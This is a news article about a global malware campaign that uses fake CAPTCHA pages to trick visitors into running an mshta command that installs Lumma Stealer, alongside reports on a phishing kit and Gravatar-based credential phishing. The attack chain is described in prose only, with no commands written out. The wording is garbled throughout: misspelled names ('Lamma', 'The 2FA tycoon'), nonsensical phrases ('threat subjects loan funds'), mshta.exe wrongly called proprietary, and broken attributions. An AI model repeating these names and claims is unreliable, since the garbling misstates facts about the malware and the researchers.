Cybersecurity researchers are turning their attention to a new malware campaign that uses fake CAPTCHA checks to deliver the infamous Lamma information stealer.
“The campaign is global, and Netskope Threat Labs is tracking victims in Argentina, Colombia, the United States, the Philippines, and other countries around the world,” said the report shared with The Hacker News.
“The campaign also spans multiple industries, including healthcare, banking and marketing, with the telecommunications industry having the largest number of targeted organizations.”
The attack chain begins when the victim visits a compromised website that directs them to a fake CAPTCHA page that instructs the site visitor to copy and paste a command into the Windows Run prompt that uses a proprietary mshta.exe binary to download and execute the HTA file from a remote server.
It should be noted that a previous iteration of this technique, widely known as Click Fixinvolved executing a Base64-encoded PowerShell script to cause a Lumma Stealer infection.
The HTA file in turn executes a PowerShell command to run the next stage payload, a PowerShell script that unpacks a second PowerShell script responsible for decoding and loading the Lumma payload, but not before taking steps to bypass the Windows antimalware scanning interface (AMSI) in an attempt to avoid detection.
“By downloading and running malware in this way, an attacker avoids browser-based protections because the victim will perform all necessary actions outside the context of the browser,” Froes explained.
“Lumma Stealer operates using a malware-as-a-service (MaaS) model and has been very active in recent months. By using different delivery methods and payloads, it makes detection and blocking of such threats more difficult, especially when abusing user interactions within the system.”
As recently as this month, Lumma was also distributed via about 1,000 fake domains impersonating Reddit and WeTransfer, which redirect users to download password-protected archives.
These archive files contain an AutoIT dropper called SelfAU3 Dropper, which then launches the theft, respectively to researcher Sekoia crep1x. At the beginning of 2023. threat subjects loan funds a similar technique to create over 1,300 domains masquerading as AnyDesk to promote the Vidar Stealer malware.
The development comes as Barracuda Networks in detail an updated version of the Phishing-as-a-Service (PhaaS) toolkit known as The 2FA tycoon which includes advanced features to “interfere with, derail, and otherwise thwart attempts by security tools to confirm its malicious intent and inspect its web pages.”
These include using legitimate—possibly compromised—email accounts to send phishing emails, and taking a number of steps to prevent analysis by detecting automated security scripts, listening for keystrokes that suggest web inspection, and disabling right-click context menus.
There have also been social engineering-based credential harvesting attacks that use avatar provider Gravatar to impersonate various legitimate services, such as AT&T, Comcast, Eastlink, Infinity, Kojeko, and Proton Mail.
“Using Gravatar’s Profiles as a Service, attackers create convincing fake profiles that mimic legitimate services, tricking users into revealing their credentials,” said SlashNext Field CTO Stephen Kowsky. said.
“Instead of conventional phishing attempts, attackers adapt their fake profiles to resemble legitimate services, which they impersonate through services that are often not known or secured.”
